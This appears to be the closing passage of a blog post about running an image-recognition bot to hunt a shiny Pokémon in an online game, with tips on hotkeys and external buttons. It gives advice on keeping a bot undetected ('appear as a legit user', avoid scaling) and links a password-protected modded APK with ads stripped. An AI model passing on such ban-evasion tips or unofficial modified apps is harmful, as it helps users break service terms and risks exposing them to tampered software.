An appropriate level of tolerance was found for each image used. The tolerance allows the image to be recognized and identified in the current screen even if some of the pixels do not match.

In general, any self “professional botter” should always keep in mind that:

• Being slow is always better! The goal is to always appear as a legit user.
• It is possible for an error to occur in the player's movement, especially when the movement is implemented without any pathfinding or state determination algorithm.
• Manual interaction is likely to be necessary if errors occur; it is not always possible to foresee all of them.
• In most cases, creating bots for specific actions is better than creating generic bots.
• Found a working solution? Don't scale it too much!

Below you will find a demo showing how the bot works; the screen was recorded in real time using scrcpy.

In 3 days, after about 32,000 encounters, I managed to capture my Shiny Pokèmon!

My solution also includes the auto increment on the Encounters Counter; other players would literally kill just for this functionality!

The APP I used to keep track of the encounters is Floating Counter.

I’ve also created a modded version of it to suppress the ads, you can download the modified APK HERE ( Password: www.balzabu.io ). Remember that no connection is required so you can turn off the “Network” permission if you want.

Extra: an un-bannable method?

Keep in mind that if you decide to use any kind of automation to help your character in the game, it’s possible that you get found and banned. For this reason I’ve decided to find other solutions that could simplify the hunting process without risking a ban.

Hotkeys

Hotkeys are a quick and easy way to associate certain actions in the game with specific keys or buttons. They are the best method to automate common tasks, such as having to use “Scent” to initiate an encounter with a horde or run away from a battle if the Pokèmon encountered were not shiny.

On computers, you can use these Hotkeys, simply pressing the corresponding keys while on Android devices you need to click on the visible element in the UI.

Although it is possible to set the hotkeys and order them as you prefer, after an extended period of use I noticed how they are particularly inconvenient on devices with slightly larger screens.

The best solution to this problem is using an external support such as headphones with Volume Up/Down buttons or external controllers. Using these devices we will have more physical buttons that we can press and then it will be possible to associate them with certain actions through APPs such as Buttons Remapper.

Pro tip: you can also use an handheld console such as the Retroid Pocket 3+.

The end?

I have to admit that this experience was very addicting, the risk of being banned added that semblance of fear that, to be honest, was very challenging and fun. After achieving my main goal, which consisted in catching a Pokèmon Shiny by simply looking at the device screen to make sure everything was working, I am enjoying all the other aspects of the game.

I am not going to sell the Shiny to make a profit, I decided to keep it as a memory of this first blog post.

I hope I’ve tickled your curiosity and if you made it this far, you’ll need to know that…We’ll meet back here soon! I have lots of things cooking that I think will be of your interest!

For questions or suggestions, contact: noc@balzabu.io.

Bye \O/ !